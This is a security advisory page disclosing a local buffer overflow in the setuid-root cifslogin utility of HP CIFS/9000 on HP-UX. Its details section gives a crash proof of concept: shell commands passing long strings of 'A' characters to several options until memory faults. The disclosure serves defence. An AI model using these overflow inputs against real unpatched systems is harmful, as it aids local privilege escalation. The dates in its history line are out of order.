Mapa web

Services

Products

I+D & Advisories

News

Customers

Partners

Employ

Advisories

SYBSEC-ADV10: HP CIFS/9000 /opt/cifsclient/bin/cifslogin Local Buffer Overflow

Title	HP CIFS/9000 /opt/cifsclient/bin/cifslogin Local Buffer Overflow
ID	SYBSEC-ADV10
Severity	HIGH - Local Buffer Overflow
History	15.JUN.2002 Vulnerability discovered 24.NOV.2001 Vendor contacted
Scope	Local Buffer Overflow Vulnerability
Platforms	HP-UX 11.11/11.00
Author	Alex Hernandez <ahernandez [at] sybsecurity [at] com>
URL	http://www.sybsecurity.com/advisors/SYBSEC-ADV10-HP_CIFS_9000_cifslogin_Local_Buffer_Overflow_Vulnerability
Release	Public
Overview	HP9000 servers running CIFS/9000 Server (Samba) versions A.01.06 and earlier are vulnerable to buffer overflows in several command line options using the opt/cifsclient/bin/cifslogin utility.
Affected versions	The vulnerability has been reported in versions HP-UX Server HP CIFS/9000 Server A.01.06 and earlie HP-UX 11.00 HP-UX 11.11
Description	By passing an overly long argument to the -U, -D, -P, -S, -N, or -u command line option, a local attacker could overflow a buffer and execute arbitrary code on the system..
Workaround	Upgrade the sofware version you can download from: http://www.hp.com
Acknowledgments	This vulnerability have been found and researched by: - Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References	* HP-UX Company: http://www.hp.com * Xforece ISS team: http://xforce.iss.net/xforce/xfdb/9431 * SYB Security: http://www.sybsecurity.com
Details	Exploit: $ id uid=110(alex) gid=102(informix) $ $ uname -a HP-UX Lab02 B.11.11 U 9000/800 1613339393 unlimited-user license $ $ ls -la /opt/cifsclient/bin/cifslogin -rwsr-xr-x 1 root users 53248 Mar 28 2001 /opt/cifsclient/bin/cifslogin $ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x10000}'` Memory fault $ $ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -s `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -f `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -u `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -S `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -N `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -s `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -f `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -u `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -S `perl -e '{print "A"x2072}'` Memory fault $ /opt/cifsclient/bin/cifslogin -N `perl -e '{print "A"x2072}'` Memory fault